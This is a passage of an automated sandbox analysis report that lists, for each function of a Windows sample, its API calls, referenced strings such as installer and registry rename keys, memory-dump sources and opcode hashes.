                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045585B,?,00000000,0045589B), ref: 004557A1
                                                                                Strings
                                                                                • PendingFileRenameOperations, xrefs: 00455740
                                                                                • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455724
                                                                                • WININIT.INI, xrefs: 004557D0
                                                                                • PendingFileRenameOperations2, xrefs: 00455770
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                • API String ID: 47109696-2199428270
                                                                                • Opcode ID: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                                                • Instruction ID: 5ff55985f0d79b0cf99ef6a0ef0ae12f56fe6c83aec1de8438bfb9543cdeefde
                                                                                • Opcode Fuzzy Hash: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                                                • Instruction Fuzzy Hash: BB519670E006089FDB10FF61DC51AEEB7B9EF45305F50857BE804A7292DB7CAA49CA58
                                                                                Function 00423A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnumLongWindows
                                                                                • String ID: lAB
                                                                                • API String ID: 4191631535-3476862382
                                                                                • Opcode ID: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                                                • Instruction ID: 20c146af1fa2ebf8fe73d6cd857ce812a249192cdefe4c29475ac4fba41381ea
                                                                                • Opcode Fuzzy Hash: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                                                • Instruction Fuzzy Hash: 4E115E70700610ABDB109F28DD85F6A77E8EB04725F50026AF9A49B2E7C378ED40CB59
                                                                                Function 0042DE54 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE60
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFFB,00000000,0042E013,?,?,?,?,00000006,?,00000000,0049722D), ref: 0042DE7B
                                                                                • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressDeleteHandleModuleProc
                                                                                • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                • API String ID: 588496660-1846899949
                                                                                • Opcode ID: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                                                • Instruction ID: 51feda2b41882886fdb541a0ee71ee95ad591444612597d61ea777cd3c773b46
                                                                                • Opcode Fuzzy Hash: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                                                • Instruction Fuzzy Hash: 3EE06DB1B41B30AAD72032A57C8AB932629DB75326F658537F005AE1D183FC2C50CE9D
                                                                                Function 0046BE48 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 276COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Need to restart Windows? %s, xrefs: 0046C172
                                                                                • PrepareToInstall failed: %s, xrefs: 0046C14B
                                                                                • NextButtonClick, xrefs: 0046BF84
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                • API String ID: 0-2329492092
                                                                                • Opcode ID: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                                                • Instruction ID: 1202268df95ceb0eead913a0caf14b6b564ec17a2e6689a58d7256d675820d07
                                                                                • Opcode Fuzzy Hash: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                                                • Instruction Fuzzy Hash: 64C16D34A04208DFCB00DB98C9D5AEE77B5EF05304F1444B7E840AB362D778AE41DBAA
                                                                                Function 00482B0C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 224COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetActiveWindow.USER32(?,?,00000000,00482E54), ref: 00482C30
                                                                                • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482CC5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveChangeNotifyWindow
                                                                                • String ID: $Need to restart Windows? %s
                                                                                • API String ID: 1160245247-4200181552
                                                                                • Opcode ID: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                                • Instruction ID: 8ca071c16d970d9f92bb59f1fa37784b4b8a51c549d6f2244aaf7164950ab745
                                                                                • Opcode Fuzzy Hash: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                                • Instruction Fuzzy Hash: 2191B4346042458FDB10EB69D9C5BAD77F4AF59308F0084BBE8009B3A2CBB8AD05CB5D
                                                                                Function 0046FD84 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                • GetLastError.KERNEL32(00000000,0046FF81,?,?,0049C1D0,00000000), ref: 0046FE5E
                                                                                • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FED8
                                                                                • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FEFD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                • String ID: Creating directory: %s
                                                                                • API String ID: 2451617938-483064649
                                                                                • Opcode ID: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                                                • Instruction ID: bdf8a9d00633064e3922ce557b3b2562df44373322d6b4000fae74d311730630
                                                                                • Opcode Fuzzy Hash: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                                                • Instruction Fuzzy Hash: AE513F74A00248ABDB04DFA5D582BDEB7F5AF09304F50817BE850B7382D7786E08CB69
                                                                                Function 00454DC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E6E
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F34), ref: 00454ED8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressByteCharMultiProcWide
                                                                                • String ID: SfcIsFileProtected$sfc.dll
                                                                                • API String ID: 2508298434-591603554
                                                                                • Opcode ID: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                                                • Instruction ID: 1a17c74f1ac94ad93f17d87dc1e08c5ddb540f3824a5df31749c88666692504e
                                                                                • Opcode Fuzzy Hash: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                                                • Instruction Fuzzy Hash: 6A41A630A042189BEB10DB69DC85B9D77B8AB4430DF5081B7E908A7293D7785F88CF59
                                                                                Function 0044B39C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B411
                                                                                • SelectObject.GDI32(?,00000000), ref: 0044B434
                                                                                • 73E9A480.USER32(00000000,?,0044B474,00000000,0044B46D,?,00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: A480A570ObjectSelect
                                                                                • String ID: k H
                                                                                • API String ID: 1230475511-1447039187
                                                                                • Opcode ID: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                                • Instruction ID: b5872ed9d16ca79c431bae9e7544c15e8f802733be01f045b529408bc148fe47
                                                                                • Opcode Fuzzy Hash: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                                • Instruction Fuzzy Hash: 6D217470A04248AFEB15DFA5C851B9EBBB9EB49304F51807AF504E7282D77CD940CB69
                                                                                Function 0044B0D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B15C,?,k H,?,?), ref: 0044B12E
                                                                                • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B141
                                                                                • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B175
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: DrawText$ByteCharMultiWide
                                                                                • String ID: k H
                                                                                • API String ID: 65125430-1447039187
                                                                                • Opcode ID: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                                                • Instruction ID: 2dd5a1fcad8022b5ecdd36c3e8438632fadfe976456551c737a9f8dd3ea145e1
                                                                                • Opcode Fuzzy Hash: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                                                • Instruction Fuzzy Hash: A3110BB6700604BFE700DB5A9C91D6F77ECD749750F10413BF504D72D0C6389E018668
                                                                                Function 0042ED48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                                  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                  • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                  • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                • API String ID: 395431579-1506664499
                                                                                • Opcode ID: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                                                • Instruction ID: a33720f3aac7210c00664dabe11b621525643aa7ae94b1405928deeb439ddd4e
                                                                                • Opcode Fuzzy Hash: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                                                • Instruction Fuzzy Hash: 1611A331B00318BBDB11EB62ED81B8E7BA8DB55704F90407BF400A6691DBB8AE05C65D
                                                                                Function 004559FC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(?,00455A67,?,00000001,00000000), ref: 00455A5A
                                                                                Strings
                                                                                • PendingFileRenameOperations2, xrefs: 00455A3B
                                                                                • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A08
                                                                                • PendingFileRenameOperations, xrefs: 00455A2C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                • API String ID: 47109696-2115312317
                                                                                • Opcode ID: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                                                • Instruction ID: a84b10804161a04e9b7828e63518c67389a2277fb2d5ef6d9c2d81c30e1ce2e0
                                                                                • Opcode Fuzzy Hash: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                                                • Instruction Fuzzy Hash: 49F09671714A04BFEB05D665DC72E3A739CD744B15FA1446BF800C6682DA7DBE04951C
                                                                                Function 0047F804 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?,00000000), ref: 0047F8AA
                                                                                • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?), ref: 0047F8B7
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D), ref: 0047F9AC
                                                                                • FindClose.KERNEL32(000000FF,0047F9D7,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?), ref: 0047F9CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileNext
                                                                                • String ID:
                                                                                • API String ID: 2066263336-0
                                                                                • Opcode ID: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                                                • Instruction ID: d4c1b09f85a1e3ce5f066f5119f691750f955bf6e0a6470712ab8dbd39f482a6
                                                                                • Opcode Fuzzy Hash: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                                                • Instruction Fuzzy Hash: 80513E71A00648AFCB10EF65CC45ADEB7B8AB88315F1085BAA818E7351D7389F49CF59
                                                                                Function 00421284 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenu.USER32(00000000), ref: 00421371
                                                                                • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Menu
                                                                                • String ID:
                                                                                • API String ID: 3711407533-0
                                                                                • Opcode ID: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                                                • Instruction ID: 7918b5ac66a49b7c70f092078a7f06842b1ce09055eaa5e04548cec6233339c2
                                                                                • Opcode Fuzzy Hash: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                                                • Instruction Fuzzy Hash: 7D41A13070025447EB20EA79A9857AB26969F69318F4805BFFC44DF3A3CA7DDC45839D
                                                                                Function 00416B52 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Color$CallMessageProcSendTextWindow
                                                                                • String ID:
                                                                                • API String ID: 601730667-0
                                                                                • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                                • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                                Function 004230D8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                • 73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                • 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: A4620A480A570EnumFonts
                                                                                • String ID:
                                                                                • API String ID: 178811091-0
